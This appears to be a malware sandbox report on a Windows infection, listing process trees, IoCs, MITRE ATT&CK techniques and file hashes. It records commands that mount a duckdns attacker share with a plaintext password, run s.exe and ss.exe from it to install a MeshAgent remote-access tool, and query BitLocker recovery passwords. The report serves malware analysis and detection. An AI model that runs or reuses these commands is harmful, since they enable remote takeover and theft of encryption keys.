Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
776	firefox.exe
776	firefox.exe
776	firefox.exe
776	firefox.exe
1848	ss.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4380 wrote to memory of 3176	4380	chrome.exe	85
PID 4380 wrote to memory of 3176	4380	chrome.exe	85
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 3000	4380	chrome.exe	86
PID 4380 wrote to memory of 3000	4380	chrome.exe	86
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 1184	4380	chrome.exe	87
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88
PID 4380 wrote to memory of 6108	4380	chrome.exe	88

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://kyberelu.rf.gd
1⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4380
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffd5a88dcf8,0x7ffd5a88dd04,0x7ffd5a88dd10
  2⤵
  PID:3176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1904,i,4941494016586704640,4034229689653859041,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2164 /prefetch:3
  2⤵
  PID:3000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2080,i,4941494016586704640,4034229689653859041,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2076 /prefetch:2
  2⤵
  PID:1184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2308,i,4941494016586704640,4034229689653859041,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2612 /prefetch:8
  2⤵
  PID:6108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,4941494016586704640,4034229689653859041,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3180 /prefetch:1
  2⤵
  PID:2852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3184,i,4941494016586704640,4034229689653859041,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3212 /prefetch:1
  2⤵
  PID:5748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4220,i,4941494016586704640,4034229689653859041,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4236 /prefetch:2
  2⤵
  PID:1896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5204,i,4941494016586704640,4034229689653859041,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5220 /prefetch:8
  2⤵
  PID:2668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=5508,i,4941494016586704640,4034229689653859041,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5496 /prefetch:1
  2⤵
  PID:2148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5620,i,4941494016586704640,4034229689653859041,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5588 /prefetch:1
  2⤵
  PID:5820

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:1212

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5380

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
PID:3292
- C:\Windows\system32\net.exe
  net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234!
  2⤵
  PID:1136
- C:\Windows\system32\net.exe
  net use
  2⤵
  PID:4520

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:5316
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Drops desktop.ini file(s)
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:776
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2004 -prefsLen 27100 -prefMapHandle 2008 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {c10bf943-304b-4079-a076-5fbf52b340ae} -parentPid 776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.776" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
    3⤵
    PID:3692
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2464 -prefsLen 27136 -prefMapHandle 2468 -prefMapSize 270279 -ipcHandle 2476 -initialChannelId {fda0854c-b83d-4453-8997-485e3ce4c948} -parentPid 776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
    3⤵
    PID:5032
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3800 -prefsLen 27277 -prefMapHandle 3804 -prefMapSize 270279 -jsInitHandle 3808 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3816 -initialChannelId {a49b9055-2815-48c4-bb8f-8e3671fb3829} -parentPid 776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
    3⤵
    - Checks processor information in registry
    PID:5636
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3976 -prefsLen 27277 -prefMapHandle 3980 -prefMapSize 270279 -ipcHandle 3796 -initialChannelId {bff0962f-a2a5-4f5a-b7de-b7daf546fbef} -parentPid 776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.776" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
    3⤵
    PID:5584
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4512 -prefsLen 34776 -prefMapHandle 4516 -prefMapSize 270279 -jsInitHandle 4520 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4528 -initialChannelId {b08e3414-b50e-452b-885a-8a8cee660dc9} -parentPid 776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
    3⤵
    - Checks processor information in registry
    PID:5168
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5080 -prefsLen 35013 -prefMapHandle 5084 -prefMapSize 270279 -ipcHandle 5092 -initialChannelId {e7fa5389-5139-4852-b216-70cf58459cae} -parentPid 776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
    3⤵
    - Checks processor information in registry
    PID:5684
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2936 -prefsLen 33031 -prefMapHandle 5680 -prefMapSize 270279 -jsInitHandle 5692 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5708 -initialChannelId {a9f76173-1347-4b28-95c5-5a7fa8ee0df4} -parentPid 776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
    3⤵
    - Checks processor information in registry
    PID:5896
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5900 -prefsLen 33031 -prefMapHandle 5904 -prefMapSize 270279 -jsInitHandle 5908 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5920 -initialChannelId {3e792491-1e41-4349-a210-9bf12685c353} -parentPid 776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
    3⤵
    - Checks processor information in registry
    PID:1080
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6108 -prefsLen 33031 -prefMapHandle 6112 -prefMapSize 270279 -jsInitHandle 6116 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6124 -initialChannelId {646705d0-e4e0-41a4-9075-b90d931f0885} -parentPid 776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
    3⤵
    - Checks processor information in registry
    PID:2884
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6408 -prefsLen 33071 -prefMapHandle 6412 -prefMapSize 270279 -jsInitHandle 6416 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6424 -initialChannelId {e4ed5f37-70cd-495c-beac-1dcc0fe5d741} -parentPid 776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab
    3⤵
    - Checks processor information in registry
    PID:1172
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 15644 -prefsLen 37023 -prefMapHandle 21204 -prefMapSize 270279 -jsInitHandle 6308 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 20520 -initialChannelId {216f4eeb-999f-4a52-94cf-706c045c0021} -parentPid 776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 11 tab
    3⤵
    - Checks processor information in registry
    PID:3280
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 13836 -prefsLen 37023 -prefMapHandle 15744 -prefMapSize 270279 -jsInitHandle 6084 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 13852 -initialChannelId {a17401cb-1cbc-456c-b10d-15b8cab5e450} -parentPid 776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 12 tab
    3⤵
    - Checks processor information in registry
    PID:3616
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6188 -prefsLen 37023 -prefMapHandle 6304 -prefMapSize 270279 -jsInitHandle 5956 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6180 -initialChannelId {f5560bac-808e-445c-9887-f18625a6a8ac} -parentPid 776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 13 tab
    3⤵
    - Checks processor information in registry
    PID:3468
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 20644 -prefsLen 37023 -prefMapHandle 6364 -prefMapSize 270279 -jsInitHandle 20540 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 13884 -initialChannelId {6b480fdd-0842-4b62-a212-97e172eea553} -parentPid 776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 14 tab
    3⤵
    - Checks processor information in registry
    PID:5372
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 13532 -prefsLen 37023 -prefMapHandle 13452 -prefMapSize 270279 -jsInitHandle 20520 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 13652 -initialChannelId {023a5f58-d8e4-4ef3-9472-6807d47c1c93} -parentPid 776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 15 tab
    3⤵
    - Checks processor information in registry
    PID:4720
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 13100 -prefsLen 37023 -prefMapHandle 13128 -prefMapSize 270279 -jsInitHandle 13040 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 13232 -initialChannelId {c83ff667-f763-4cee-9676-4e05b76e6d3b} -parentPid 776 -crashReporter "\\.\pipe\gecko-crash-server-pipe.776" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 16 tab
    3⤵
    - Checks processor information in registry
    PID:5536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
1⤵
PID:3660

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5764

\??\UNC\aaso12.duckdns.org\shear\s.exe
"\\aaso12.duckdns.org\shear\s.exe"
1⤵
PID:3280
- \??\UNC\aaso12.duckdns.org\shear\s.exe
  "\\aaso12.duckdns.org\shear\s.exe" -fullinstall
  2⤵
  - Sets service image path in registry
  - Drops file in Program Files directory
  PID:5580

C:\Program Files\Mesh Agent\MeshAgent.exe
"C:\Program Files\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:3092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Drops file in System32 directory
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3796
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:8
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Drops file in System32 directory
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:392
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5556
- C:\Windows\system32\cmd.exe
  /c manage-bde -protectors -get C: -Type recoverypassword
  2⤵
  PID:5920
- - C:\Windows\system32\manage-bde.exe
    manage-bde -protectors -get C: -Type recoverypassword
    3⤵
    PID:3488
- C:\Windows\system32\cmd.exe
  /c manage-bde -protectors -get F: -Type recoverypassword
  2⤵
  PID:4940
- - C:\Windows\system32\manage-bde.exe
    manage-bde -protectors -get F: -Type recoverypassword
    3⤵
    PID:4136

\??\UNC\aaso12.duckdns.org\shear\ss.exe
"\\aaso12.duckdns.org\shear\ss.exe"
1⤵
PID:1816
- \??\UNC\aaso12.duckdns.org\shear\ss.exe
  "\\aaso12.duckdns.org\shear\ss.exe" -fullinstall
  2⤵
  - Sets service image path in registry
  - Drops file in Program Files directory
  PID:2464

C:\Program Files\Mesh Agent\MeshAgent.exe
"C:\Program Files\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
PID:4264
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4732
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Drops file in System32 directory
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2904
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:1572
- C:\Windows\system32\cmd.exe
  /c manage-bde -protectors -get C: -Type recoverypassword
  2⤵
  PID:3104
- - C:\Windows\system32\manage-bde.exe
    manage-bde -protectors -get C: -Type recoverypassword
    3⤵
    PID:1992
- C:\Windows\system32\cmd.exe
  /c manage-bde -protectors -get F: -Type recoverypassword
  2⤵
  PID:2160
- - C:\Windows\system32\manage-bde.exe
    manage-bde -protectors -get F: -Type recoverypassword
    3⤵
    PID:2420

\??\UNC\aaso12.duckdns.org\shear\ss.exe
"\\aaso12.duckdns.org\shear\ss.exe"
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1848
- \??\UNC\aaso12.duckdns.org\shear\ss.exe
  "\\aaso12.duckdns.org\shear\ss.exe" -fulluninstall
  2⤵
  PID:1080

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Mesh Agent\MeshAgent.db

Filesize
154KB

MD5
2acd35ad2eabdd4ff7a3efaf90c53850

SHA1
bc1aef79059b89b1efe63880bf09d227d1ca9546

SHA256
80210b6d0f4c7f37966cf16865bff9006748dbf53d2b52a43b46aca42e9bb5a2

SHA512
a44ab03eb40e5628009c25fb16e49670b1681641b0a8c0c3fffa9ead2f71c1e675cce1aad05579774a89ed5d9bb1dd6874b6a4209f202695ccf54b0fad36ff2d

Download Submit
C:\Program Files\Mesh Agent\MeshAgent.db

Filesize
154KB

MD5
59e15389ca098b6a6137dd90ba85b502

SHA1
853174af9680d4c80ca767b12fbeb198d5ed1cc7

SHA256
49bb31c74ec83a1e5abe2420d7bb6e04973b2add5c7a5c267fd2900ec7fa0af3

SHA512
b3242aeaeaffb47e59738f4f343eddc4f39c6aebcb5c831b0efcf96206b88d2cfeee597c56fd1a267f3891f63b4c8477721aa6894f6103982839ea578e652996

Download Submit
C:\Program Files\Mesh Agent\MeshAgent.db.tmp

Filesize
154KB

MD5
1549e9d8f774c93c8ffb91cb8bbeac85

SHA1
8977a861138ac1467cb7fc73db006220a725dd36

SHA256
f04d8b70b75ed165220721fa9b1f0ddc72cf4888705afe368ecc0dcda9d57cb9

SHA512
e3bb8f633f66eacabdd49f8e3bca41fe5b0d7f191aa28a650a8acca5ec486790e48799c21fcc1403ded4ab95e785ca734259c3aef1af2e8acf85683a065aae29

Download Submit
C:\Program Files\Mesh Agent\MeshAgent.exe

Filesize
3.3MB

MD5
e2264eb1b5f614db39e8dadde0c4c487

SHA1
6cd4fbf6499071686fc8c448307f17d141199ea1

SHA256
3f38dab1278850190a70c91a9671fdada649bbd6f8abafba9970c7f43c59565d

SHA512
cc1347041f87d823f304afad43d225a6c48bc2016d724a1b2ac5ec3e52fbd7adf846f5bdee6f6dde8de6fe0c29c0bd0d4502edb0a30a59b9ac709703415b7923

Download Submit
C:\Program Files\Mesh Agent\MeshAgent.exe

Filesize
3.3MB

MD5
cf8c41eda51245ca8e525a136f6ab434

SHA1
fb0df8c5f3ac3bc063cc747b8c091a337bcb6029

SHA256
da542b5504577e80da1afe1d7cd8169bcc98605cba27f49b4709b4d79079393c

SHA512
683b9a67309275168d3223af5e1ad9f9d2ffe8b52ef85a81cb295afba4ab3e5dd0455c744240feae9373fb25822e73fe7d88e0a6edceabcaf2ab689840b48c86

Download Submit
C:\Program Files\Mesh Agent\MeshAgent.msh

Filesize
31KB

MD5
dce96225343896dc9164783dd4aa9a74

SHA1
bb12f96d19f51e33641645f562b7c84feaaaee22

SHA256
11e38a81537e3f0afd800da7e4fe8cf938bd76075b6e464c7c42c7b489fb7d59

SHA512
eebefd09343e4010cca92fb5834a3ac0885bd363c9dc0042bd4da35b11556e8546f6d0f3c68b54d5f8111aee4252e4eab396245f4a692e97f63b0718c69f9d78

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
e8e173161b4889033e399b6071003399

SHA1
c3a8b5b2eb2383403aca141502acfe71b5c57f35

SHA256
16862a9caa37aa62f9d6beb0eccbd718ca8f4f3f65157338463953f18acf5ab6

SHA512
753607b802ea4336ce14e5854aa023ff0dcfcd7231773e06af87fec3338b2c0a60db03d065464c987c4e003f6c1e25ef9737b2688032b4ba900e071702442f9d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
144B

MD5
bc779346ef7c7bfb7ab7272a3a992aff

SHA1
91dc49094a11488b97fe01a63647b5bcd574a5d2

SHA256
0e81a5188bb32ea608cb46c111e3a080f245f3eb156fdbe61e953a716349c6c4

SHA512
4263dcd69bd8dfcf58d19a53b3eb413c2c57a1eee05bffaacca9ab79114372e76b5cde9192325c595869076810a58c2dce052962eafcbfbfa03257af21719f33

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnWebGPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
